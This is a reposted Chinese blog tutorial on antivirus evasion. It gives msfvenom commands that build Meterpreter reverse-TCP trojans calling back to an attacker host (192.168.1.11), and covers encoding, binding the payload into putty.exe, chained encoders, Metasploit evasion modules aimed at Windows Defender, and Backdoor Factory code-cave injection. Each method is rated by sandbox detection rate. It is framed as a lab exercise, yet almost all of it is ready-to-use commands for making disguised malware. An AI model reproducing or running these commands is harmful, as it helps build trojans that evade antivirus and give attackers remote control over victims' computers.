作者:感动宇宙coolboy_796 | 来源:互联网 | 2023-05-17 18:02
本文主要介绍关于安全的知识点,对【常见的几种免杀方法】和【如何实现免杀】有兴趣的朋友可以看下由【嘎嘎不是鸭】投稿的技术文章,希望该技术和经验能帮到你解决你所遇的【内网渗透】相关技术问题。如何实现免杀
本文主要介绍关于安全的知识点,对【常见的几种免杀方法】和【如何实现免杀】有兴趣的朋友可以看下由【嘎嘎不是鸭】投稿的技术文章,希望该技术和经验能帮到你解决你所遇的【内网渗透】相关技术问题。
如何实现免杀
攻击机kali:192.168.1.11? ? ? ? ?靶机Windows7:192.168.1.18
1、自编码免杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用
微步沙箱检测结果,检出率近一半,效果一般
????
2、自捆绑免杀
? ? ? ? 在生成payload时可以使用捆绑功能,使用msfvenom的 -x 参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,-x 后跟对应的文件路径即可。示例中已在当前文件夹下准备好了模板
msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -f exe -o shell2.exe
靶机运行木马成功反弹shell,木马可正常使用
?微步检测结果,检出率近一半,效果一般
3、自捆绑+编码免杀
msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell3.exe
?在靶机运行木马反弹shell成功
微步沙箱检测结果,免杀效果一般?
4、多重编码+捆绑免杀
? ? ? ? msfvenom的encoder编码器可以对payload进行一定程度的免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同的编码器反复编码进行混淆。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.1.11 lport=4444 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e cmd/powershell_base64 -a x86 --platform windows -x putty.exe -f exe -o shell4.exe
靶机运行木马反弹shell成功,免杀效果一般(免杀方式可多种方式混合使用)
?5、evasion免杀
? ? ? ?2019年1月,metasploit升级为5.0,引入了一个新模块叫evasion模块,官方称这个模块可以创建反杀毒软件的木马
模块:windows/windows_defender_exe、windows/windows_defender_js_hta
msf6 exploit(multi/handler) > use windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set filename shell5.exe
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.1.11
msf6 evasion(windows/windows_defender_exe) > set lport 4444
msf6 evasion(windows/windows_defender_exe) > run
?靶机运行木马反弹shell成功,
6、backdoor factory
????????backdoor-factory,又称后门工厂(BFD),BFD也是一款老牌的免杀神器,其作者曾经在2015年的blackhat大会上介绍过该工具,但是作者已经于2017年停止更新,免杀效果至今还算是不错。
检查宿主是否支持patch
python backdoor.py -f 程序路径 -S
-f:指定测试程序
-S:检查程序是否支持
?查看宿主程序代码缝隙
python backdoor.py -f 程序路径 -c
-c:查看程序代码缝隙
?获取该文件的可用payload
python backdoor.py -f 程序路径 -s show
-s:选择使用payload
?指定payload、回连地址和端口、输出程序名、指定使用的代码缝隙
python backdoor.py -f 程序路径 -s 指定payload -J -H 回连地址 -P 回连端口 -o 输出程序名
-J:使用多代码缝隙注入
?微步沙箱检测,免杀效果较好
?生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 10 -f raw -o shellcode.c
注入shellcode
python backdoor.py? -f 程序路径 -s 指定payload -U 指定shellcode -H 回连ip -P 回连端口 -o 输出程序名
?
本文《常见的几种免杀方法》版权归嘎嘎不是鸭所有,引用常见的几种免杀方法需遵循CC 4.0 BY-SA版权协议。